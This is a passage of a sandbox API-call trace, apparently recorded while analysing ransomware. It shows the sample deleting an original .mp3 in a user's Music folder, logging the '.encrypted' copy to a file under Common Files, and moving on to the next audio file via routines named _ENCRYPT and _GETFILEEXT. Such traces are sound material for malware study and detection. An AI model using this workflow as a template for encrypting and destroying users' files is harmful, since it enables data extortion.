dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="0_h8M557-V1.mp3", cAlternateFileName="0_H8M5~1.MP3")) returned 0x7c2240 [0037.246] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0_h8m557-v1.mp3")) returned 1 [0037.247] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f11b00, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x61550420, ftLastAccessTime.dwHighDateTime=0x1d5c100, ftLastWriteTime.dwLowDateTime=0x15e95800, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1143, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="0_h8M557-V1.mp3", cAlternateFileName="0_H8M5~1.MP3")) returned 0 [0037.248] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.248] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.248] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.248] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.248] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.248] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.248] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.249] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.249] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.249] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.249] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.249] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.249] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.249] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.249] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.249] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.250] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2104, lpOverlapped=0x0) returned 1 [0037.250] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.250] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2104, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.250] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.250] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0037.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.encrypted.mp3\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0037.250] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.encrypted.mp3\r\n", cchWideChar=64, lpMultiByteStr=0x7ab380, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 64 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.251] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0037.251] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.252] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.252] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.252] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.252] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.252] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.252] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.252] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.252] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3lv09d8.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.252] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.254] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.254] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.254] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.254] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.254] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.254] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.254] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.255] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.255] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.255] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.255] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.255] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.255] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.255] HeapFree 